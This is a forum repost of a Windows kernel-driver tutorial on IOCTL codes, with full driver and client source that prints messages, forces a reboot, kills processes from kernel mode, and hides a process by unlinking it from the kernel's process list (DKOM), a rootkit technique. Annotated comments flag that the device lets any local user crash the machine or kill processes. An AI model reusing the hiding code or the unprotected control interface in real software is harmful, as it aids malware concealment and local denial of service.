Nytro — Posted August 23, 2013

Using IOCTL codes
zwclose7

I am studying IOCTL codes, so I wrote a driver to test how IOCTL codes work. This example has two parts: a kernel mode driver and a user mode application. The user mode application sends IOCTL codes to the kernel mode driver, and the driver performs some actions.

The driver includes the following features:
1) Display strings in DebugView.
2) Restart the operating system.
3) Terminate running processes.
4) Hide a running process using DKOM.

User mode application:

Usage: IOCTLTest [command] [parameters]...

Commands:
IOCTLTest hello [string]
Send a string to the driver, which will be displayed in DebugView.
IOCTLTest restart
Cause the driver to call KeBugCheck with POWER_FAILURE_SIMULATE, which will restart the operating system.
IOCTLTest kill [PID]
Terminate a process using the ZwTerminateProcess function.
IOCTLTest hide [PID]
Hide a process using DKOM.

Installing the driver:
To install the driver, open the install.bat file.
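This will install the driver, and then load it.

Source code:

Driver

#include <ntifs.h>
#include <ntddk.h>

/* Control codes shared with the user-mode tool. With METHOD_OUT_DIRECT the
   input buffer of each request is copied to irp->AssociatedIrp.SystemBuffer;
   none of the codes returns output. */
#define IOCTL_HELLO_WORLD        CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)
#define IOCTL_RESTART_SYSTEM     CTL_CODE(FILE_DEVICE_UNKNOWN,0x901,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)
#define IOCTL_TERMINATE_PROCESS  CTL_CODE(FILE_DEVICE_UNKNOWN,0x902,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)
#define IOCTL_HIDE_PROCESS       CTL_CODE(FILE_DEVICE_UNKNOWN,0x903,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)

/* Largest message accepted by IOCTL_HELLO_WORLD, terminator included. */
#define HELLO_MAX_MESSAGE 256

PDEVICE_OBJECT pDeviceObject;
UNICODE_STRING dev,dos;   /* device name and DosDevices link; dos is reused by Unload */

/* Complete irp with the given status and zero bytes of output. Every dispatch
   routine below finishes through this single exit path. */
static NTSTATUS CompleteIrp(PIRP irp,NTSTATUS status)
{
    irp->IoStatus.Status=status;
    irp->IoStatus.Information=0;
    IoCompleteRequest(irp,IO_NO_INCREMENT);
    return status;
}

/* Fetch the process id the user-mode tool sends as a 4-byte DWORD and widen it
   to a HANDLE. Reading a HANDLE straight out of the buffer would read 8 bytes
   from a 4-byte allocation on 64-bit builds, and a request with no input has a
   NULL SystemBuffer. Returns STATUS_BUFFER_TOO_SMALL in both cases. */
static NTSTATUS ReadProcessId(PIRP irp,PIO_STACK_LOCATION io,PHANDLE pid)
{
    if(irp->AssociatedIrp.SystemBuffer==NULL ||
       io->Parameters.DeviceIoControl.InputBufferLength<sizeof(ULONG))
    {
        return STATUS_BUFFER_TOO_SMALL;
    }
    *pid=(HANDLE)(ULONG_PTR)(*(PULONG)irp->AssociatedIrp.SystemBuffer);
    return STATUS_SUCCESS;
}

/* Offset of EPROCESS.ActiveProcessLinks for the kernel versions this driver
   handles: Windows 2000 (5.0), XP (5.1), Vista (6.0) and 7 (6.1). Returns 0 for
   any other version so the caller refuses instead of writing through a guessed
   offset. The table was taken from 32-bit kernels; 64-bit EPROCESS layouts
   differ, so 64-bit builds always get 0. */
static ULONG ActiveProcessLinksOffset(ULONG MajorVersion,ULONG MinorVersion)
{
#ifdef _WIN64
    UNREFERENCED_PARAMETER(MajorVersion);
    UNREFERENCED_PARAMETER(MinorVersion);
    return 0;
#else
    if(MajorVersion==5 && MinorVersion==0) return 0xa0;
    if(MajorVersion==5 && MinorVersion==1) return 0x88;
    if(MajorVersion==6 && MinorVersion==0) return 0xa0;
    if(MajorVersion==6 && MinorVersion==1) return 0xb8;
    return 0;
#endif
}

/* Driver unload: remove the DosDevices link, then the device object. */
void Unload(PDRIVER_OBJECT pDriverObject)
{
    DbgPrint("Unload routine called.\n");
    IoDeleteSymbolicLink(&dos);
    IoDeleteDevice(pDriverObject->DeviceObject);
}

/* IRP_MJ_CREATE: every open that reaches the device is accepted. */
NTSTATUS Create(PDEVICE_OBJECT DeviceObject,PIRP irp)
{
    UNREFERENCED_PARAMETER(DeviceObject);
    DbgPrint("Create routine called.\n");
    return CompleteIrp(irp,STATUS_SUCCESS);
}

/* IRP_MJ_CLOSE: nothing to release per handle. */
NTSTATUS Close(PDEVICE_OBJECT DeviceObject,PIRP irp)
{
    UNREFERENCED_PARAMETER(DeviceObject);
    DbgPrint("Close routine called.\n");
    return CompleteIrp(irp,STATUS_SUCCESS);
}

/* IRP_MJ_DEVICE_CONTROL dispatch. Input for every code is read from
   irp->AssociatedIrp.SystemBuffer and validated against InputBufferLength
   before use, because the caller is user mode. Returns the status the IRP is
   completed with. */
NTSTATUS IOCTL(PDEVICE_OBJECT DeviceObject,PIRP irp)
{
    PIO_STACK_LOCATION io;
    PEPROCESS ep;
    PLIST_ENTRY PrevListEntry,CurrentListEntry,NextListEntry;
    HANDLE hProcess,pid;
    NTSTATUS status=STATUS_SUCCESS;
    ULONG MinorVersion,MajorVersion,offset,length;
    CLIENT_ID cid;
    OBJECT_ATTRIBUTES oa;
    char message[HELLO_MAX_MESSAGE];

    UNREFERENCED_PARAMETER(DeviceObject);
    DbgPrint("IOCTL routine called.\n");
    io=IoGetCurrentIrpStackLocation(irp);
    length=io->Parameters.DeviceIoControl.InputBufferLength;

    switch(io->Parameters.DeviceIoControl.IoControlCode)
    {
    case IOCTL_HELLO_WORLD:
        /* The caller may not have NUL-terminated the string, so copy at most
           HELLO_MAX_MESSAGE-1 bytes into a local buffer and terminate it here
           instead of pointing %s at the raw system buffer. */
        if(irp->AssociatedIrp.SystemBuffer==NULL || length==0)
        {
            status=STATUS_INVALID_PARAMETER;
            break;
        }
        if(length>HELLO_MAX_MESSAGE-1) length=HELLO_MAX_MESSAGE-1;
        RtlCopyMemory(message,irp->AssociatedIrp.SystemBuffer,length);
        message[length]='\0';
        DbgPrint("Data from user mode: %s\n",message);
        status=STATUS_SUCCESS;
        break;

    case IOCTL_RESTART_SYSTEM:
        /* KeBugCheck with POWER_FAILURE_SIMULATE restarts the computer without
           displaying a BSOD; it does not return. */
        KeBugCheck(POWER_FAILURE_SIMULATE);
        break;

    case IOCTL_TERMINATE_PROCESS:
        status=ReadProcessId(irp,io,&cid.UniqueProcess);
        if(!NT_SUCCESS(status)) break;
        cid.UniqueThread=NULL;
        DbgPrint("Terminating process %lu\n",(ULONG)(ULONG_PTR)cid.UniqueProcess);
        /* OBJ_KERNEL_HANDLE keeps the handle out of the caller's table;
           PROCESS_TERMINATE is all ZwTerminateProcess needs. */
        InitializeObjectAttributes(&oa,NULL,OBJ_KERNEL_HANDLE,NULL,NULL);
        status=ZwOpenProcess(&hProcess,PROCESS_TERMINATE,&oa,&cid);
        if(!NT_SUCCESS(status)) break;
        status=ZwTerminateProcess(hProcess,1);
        ZwClose(hProcess);
        break;

    case IOCTL_HIDE_PROCESS:
        status=ReadProcessId(irp,io,&pid);
        if(!NT_SUCCESS(status)) break;
        DbgPrint("Hiding process %lu with DKOM.\n",(ULONG)(ULONG_PTR)pid);
        status=PsLookupProcessByProcessId(pid,&ep);
        if(!NT_SUCCESS(status)) break;
        PsGetVersion(&MajorVersion,&MinorVersion,NULL,NULL);
        offset=ActiveProcessLinksOffset(MajorVersion,MinorVersion);
        if(offset==0)
        {
            /* Unknown kernel version (or a 64-bit build): refuse rather than
               write through a wrong offset. */
            ObDereferenceObject(ep);
            status=STATUS_UNSUCCESSFUL;
            break;
        }
        /* DKOM: unlink the EPROCESS from the kernel's active-process list by
           rewriting its neighbours' pointers, then point the entry at itself.
           No lock is taken on the list and the offset is version specific; a
           self-referencing entry with no list membership is exactly what
           cross-view process enumeration and kernel integrity checks look for.
           Kept as the author wrote it. */
        CurrentListEntry=(PLIST_ENTRY)((PUCHAR)ep+offset);
        PrevListEntry=CurrentListEntry->Blink;
        NextListEntry=CurrentListEntry->Flink;
        PrevListEntry->Flink=NextListEntry;
        NextListEntry->Blink=PrevListEntry;
        CurrentListEntry->Flink=(PLIST_ENTRY)&(CurrentListEntry->Flink);
        CurrentListEntry->Blink=(PLIST_ENTRY)&(CurrentListEntry->Flink);
        ObDereferenceObject(ep);
        status=STATUS_SUCCESS;
        break;

    default:
        DbgPrint("Unknown IOCTL code: %#lx\n",io->Parameters.DeviceIoControl.IoControlCode);
        status=STATUS_INVALID_DEVICE_REQUEST;
        break;
    }
    return CompleteIrp(irp,status);
}

/* Driver entry: create \Device\ioctl and its \DosDevices\ioctl link, then
   install the dispatch routines. Both I/O-manager calls are checked and undone
   on failure so a half-initialised driver is not left loaded. */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath)
{
    NTSTATUS status;

    UNREFERENCED_PARAMETER(pRegistryPath);
    DbgPrint("DriverEntry called.\n");
    RtlInitUnicodeString(&dev,L"\\Device\\ioctl");
    RtlInitUnicodeString(&dos,L"\\DosDevices\\ioctl");

    /* NOTE(review): IoCreateDevice leaves the device with the I/O manager's
       default security descriptor, which typically lets non-administrators
       open FILE_DEVICE_UNKNOWN devices; FILE_DEVICE_SECURE_OPEN only extends
       that descriptor to names below the device. Every control code here is
       FILE_ANY_ACCESS, so any local user who can open \\.\ioctl can bugcheck
       the machine or terminate a process. The usual fix is to create the
       device with IoCreateDeviceSecure and SDDL_DEVOBJ_SYS_ALL_ADM_ALL
       (wdmsec.h, link wdmsec.lib), or to check the caller's privileges in the
       dispatch routine. */
    status=IoCreateDevice(pDriverObject,0,&dev,FILE_DEVICE_UNKNOWN,FILE_DEVICE_SECURE_OPEN,FALSE,&pDeviceObject);
    if(!NT_SUCCESS(status))
    {
        DbgPrint("IoCreateDevice failed: %#lx\n",(ULONG)status);
        return status;
    }
    status=IoCreateSymbolicLink(&dos,&dev);
    if(!NT_SUCCESS(status))
    {
        DbgPrint("IoCreateSymbolicLink failed: %#lx\n",(ULONG)status);
        IoDeleteDevice(pDeviceObject);
        return status;
    }

    pDriverObject->MajorFunction[IRP_MJ_CREATE]=Create;
    pDriverObject->MajorFunction[IRP_MJ_CLOSE]=Close;
    pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=IOCTL;
    pDriverObject->DriverUnload=Unload;
    pDeviceObject->Flags|=DO_DIRECT_IO;
    pDeviceObject->Flags&=~DO_DEVICE_INITIALIZING;
    DbgPrint("IOCTL Test driver loaded.\n");
    return STATUS_SUCCESS;
}

Application

#include <stdio.h>
#include <Windows.h>

/* Control codes; must match the driver's definitions exactly. */
#define IOCTL_HELLO_WORLD \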
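CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)
#define IOCTL_RESTART_SYSTEM     CTL_CODE(FILE_DEVICE_UNKNOWN,0x901,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)
#define IOCTL_TERMINATE_PROCESS  CTL_CODE(FILE_DEVICE_UNKNOWN,0x902,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)
#define IOCTL_HIDE_PROCESS       CTL_CODE(FILE_DEVICE_UNKNOWN,0x903,METHOD_OUT_DIRECT,FILE_ANY_ACCESS)

#include <stdlib.h>   /* strtoul */
#include <string.h>   /* strlen, _stricmp */

/* Parse argv[2] as a decimal process id into *pid. Prints a usage line and
   returns FALSE when the argument is missing or is not entirely numeric; the
   original dereferenced argv[2] without checking argc and took whatever atoi
   produced. */
static BOOL ParsePid(int argc,char *argv[],DWORD *pid)
{
    char *end;
    unsigned long value;

    if(argc<3 || argv[2][0]=='\0')
    {
        printf("\nUsage: IOCTLTest %s [PID]\n",argv[1]);
        return FALSE;
    }
    value=strtoul(argv[2],&end,10);
    if(*end!='\0')
    {
        printf("\nError: '%s' is not a valid PID.\n",argv[2]);
        return FALSE;
    }
    *pid=(DWORD)value;
    return TRUE;
}

/* Entry point: IOCTLTest [command] [parameter]. The command line is validated
   first, then the driver is opened, exactly one control code is issued and the
   handle is closed. Exit code 0 on success, 1 on any error. */
int main(int argc,char* argv[])
{
    HANDLE hFile;
    DWORD dw,pid,err;
    DWORD code;
    LPVOID input=NULL;
    DWORD inputSize=0;
    BOOL bResult;

    if(argc<2)
    {
        printf("\nUsage: IOCTLTest [command] [parameter]\n");
        return 1;
    }

    if(!_stricmp("hello",argv[1]))
    {
        /* Usage is "hello [string]": the message is argv[2], not the command
           word itself, and the terminating NUL is sent along so the driver
           receives a complete C string. */
        if(argc<3)
        {
            printf("\nUsage: IOCTLTest hello [string]\n");
            return 1;
        }
        code=IOCTL_HELLO_WORLD;
        input=argv[2];
        inputSize=(DWORD)strlen(argv[2])+1;
    }
    else if(!_stricmp("restart",argv[1]))
    {
        code=IOCTL_RESTART_SYSTEM;
    }
    else if(!_stricmp("kill",argv[1]))
    {
        if(!ParsePid(argc,argv,&pid)) return 1;
        code=IOCTL_TERMINATE_PROCESS;
        input=&pid;
        inputSize=sizeof(DWORD);
    }
    else if(!_stricmp("hide",argv[1]))
    {
        if(!ParsePid(argc,argv,&pid)) return 1;
        code=IOCTL_HIDE_PROCESS;
        input=&pid;
        inputSize=sizeof(DWORD);
    }
    else
    {
        /* The original fell off the end and exited 0 for an unknown command. */
        printf("\nUnknown command: %s\n",argv[1]);
        printf("\nUsage: IOCTLTest [command] [parameter]\n");
        return 1;
    }

    /* The control codes are FILE_ANY_ACCESS, so read/write access is all the
       tool needs; GENERIC_ALL requested more than it ever uses. */
    hFile=CreateFile("\\\\.\\ioctl",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
    if(hFile==INVALID_HANDLE_VALUE)
    {
        printf("\nError: Unable to open the IOCTL Test driver. (%lu)\n",GetLastError());
        return 1;
    }

    bResult=DeviceIoControl(hFile,code,input,inputSize,NULL,0,&dw,NULL);
    err=GetLastError();   /* captured before CloseHandle can overwrite it */
    CloseHandle(hFile);
    if(!bResult)
    {
        printf("\nError: %lu\n",err);
        return 1;
    }
    printf("\nSuccessfully sent control code to driver.\n");
    return 0;
}

Attached Files
IOCTLTest.zip 348.52K 1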
downloads

Sursa: Using IOCTL codes - rohitab.com - Forums